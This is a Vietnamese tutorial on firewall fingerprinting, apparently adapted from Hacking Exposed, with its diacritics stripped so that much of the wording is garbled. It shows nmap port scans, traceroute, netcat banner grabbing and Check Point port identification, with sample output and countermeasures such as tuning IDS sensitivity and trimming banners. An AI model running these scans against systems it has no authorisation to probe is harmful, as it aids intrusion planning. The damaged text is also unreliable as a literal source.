1. Tng quan v tng la :

- Theo t c bit th hin nay trn th trng c 2 loi tng la : y nhim ng dng(application proxies) v cng lc gi tin ( packet filtering getways ).

2. Nhn dng tng la

-Hu ht th cc tng la thng c 1 s dng c trng, ch cn thc hin mt s thao tc nh qut cng v firewalking v ly banner (thng tin gii thiu-tiu ) l hacker c th xc nh c loi tng la, phin bn v quy lut ca chng.

-Theo cc bn th ti sao nhn dng tng la li quan trng ? v cu tr li l Bi nu nh bit c cc thng tin ch xc v tng la v cch khai thc nhng im yu ny .

a. Qut trc tip - k thut l liu + Cch tin hnh -Mt cch n gin nht tm ra tng la l qut cc cng mc nh. Theo t c bit th mt vi tng la trn th trng t nhn dng mnh bng vic qut cng - ta ch cn bit nhng cng no cn qut . V d nh Proxy Sever ca Microsoft nghe cc cng TCP 1080 va 1745 etc..

Nh vy tm tng la ta s dng nmap n gin nh sau :

Nmap -n -vv -p0 -p256,1080,1745 192.168.50.1 -60.250

T nhng k tn cng vng v cho n nhng k snh si u dng phng php qut din rng i vi mng lm vic ca bn nhn din tng la.Tuy nhin , nhng hacker nguy him s tin hnh cng vic qut cng thm lng , cng kn o cng tt . Cc hacker c thdung nhiu k thut thot khi s pht hin ca chng ta bao gm ping ngu nhin ... Cc h thng d xm nhp ( IDS - Intruction Detection System ) khng th pht hin nhng hnh ng qut cng p dng nhng k thut tinh vi ln trnh bi chng c ngm nh lp cu hnh ch nghe nhng hnh ng qut cng l liu nht m thi .

Tr khi chng ta c nhng thit lp ng n cho IDS , nu khng vic qut cng s din ra rt m thm v nhanh chng. Chng ta hon ton c th to ra nhng hnh vi qut cng nh vy khi s dng nhng on script c sn trn nhiu trang web nh : www.hackingexposed.com

*** Cch i ph *** Nu cc b dng RealSecure 3.0 th c th lm nh sau:

- RealSecure 3.0 c th pht hin ra cc hnh vi qut cng , chng ta cn phi nng cao tnh nhy cm ca n , c th s dng nhng thay i sau : - Chn Network Engine Policy - Tm "Port Scan " v chn nt Options - Sa Ports thnh 5 ports - Sa Delta thnh 60 seconds

- ngn chn vic qut cng tng la t Internet ta cn phi kha cc cng ny nhng router ng trc Firewall.Trong trng hp nhng thit b ny do ISP qun l, ta phi lin h vi h.

b. Ln theo tuyn (Route tracking )- S dng chng trnh traceroute nhn din tng la trn mt mng lm vic l mt phng php m thm v khng kho hn. Chng ta c th s dng traceroute trn mi trng UNIX v tracert.exe trn mi trng Windows NT tm ng n mc tiu. Traceroute ca LINUX c kha la chn -I thc hin vic ln theo tuyn bng cch gi i cc gi ICMP

[vtt]$ traceroute -I 192.168.51.100 traceroute to 192.168.51.101 (192.168.51.100), 30 hops max, 40 byte packages 1 attack-gw (192.168.50.21) 5.801 ms 5.105 ms 5.445 ms 2 gw1.smallisp.net (192.168.51.1) .... 15 192.168.51.101 (192.168.51.100)

3.Ly banner (banner grabbing)

- Qut cng l mt bin php rt hiu qu trong vic xc nh firewall nhng ch c Checkpoint v Microsoft nghe trn cc cng ngm nh , cn hu ht cc tng la th khng nh vy , do chng ta cn phi suy din thm . Nhiu tng la ph bin thng thng bo s c mt ca mnh mi khi c kt ni ti chng.Bng vic kt ni ti mt a ch no ,ta c th bit c chc nng hot ng , loi v phin bn tng la. V d khi chng ta dng chng trnh netcat kt ni ti mt my tnh nghi ngh c tng la qua cng 21( F b s t) ta c th thy mt s thng tin th v nh sau : c:\>nc -v -n 192.168.51.129 21 (unknown) [192.168.51.129] 21 (?) open 220 Secure Gateway FTP sever ready

-Dng thng bo (banner) "Secure Gateway FTP sever ready" l du hiu ca mt loi tng la c ca Eagle Raptor. chc chn hn chng ta c th kt ni ti cng 23 (telnet) : C:\>nc -v -n 192.168.51.129 23 (unknown) [192.168.51.129] 23 (?) open Eagle Secure Gateway. Hostname :

-Cui cng nu vn cha chc chn ta c th s dng netcat vi cng 25(SMTP)

C:\>nc -v -n 192.168.51.129 25 (unknown) [192.168.51.129] 25 (?) open 421 fw3.acme.com Sorry, the firewall does not provide mail service to you

-Vi nhng thng tin v gi tr thu thp c t banner,hacker c th khai thc cc im yu ca Firewall( dc pht hin ra t trc ) tn cng .

Cch i ph - Theo t hiu th i ph th chugns ta cn phi gim thiu thng tin banner, iu ny ph thuc rt nhiu vo cc nh cung cp firewall. Ta c th ngn chn vic b l qu nhiu thng tin tng la bng cch thng xuyn sa i cc file cu hnh banner. iu ny th cc bn nn tham kho thm t cc nh cung cp dch v.

4.Nhn din cng (port identification)

Mt vi firewall c "du hiu nhn dng " c th c dng phn bit vi cc loi tng la khc bng cch hin ra mt si cc con s .V d nh CheckPoint Firewall khi ta kt ni ti cng TCP 257 qun l SNMP. S hin din ca cc cng t 256 ti 259 trn h thng chnh l du hiu bo trc s c mt ca CheckPoint Firewall-1 , ta c th th nh sau:

[vtt]# nc -v -n 192.168.51.1 257 (unknown) [192.168.51.1] 257 (?) open 30000003

[vtt]# nc -v -n 172.29.11. 191 257 (unknown) [172.29.11. 191] 257 (?) open 30000000PAGE 34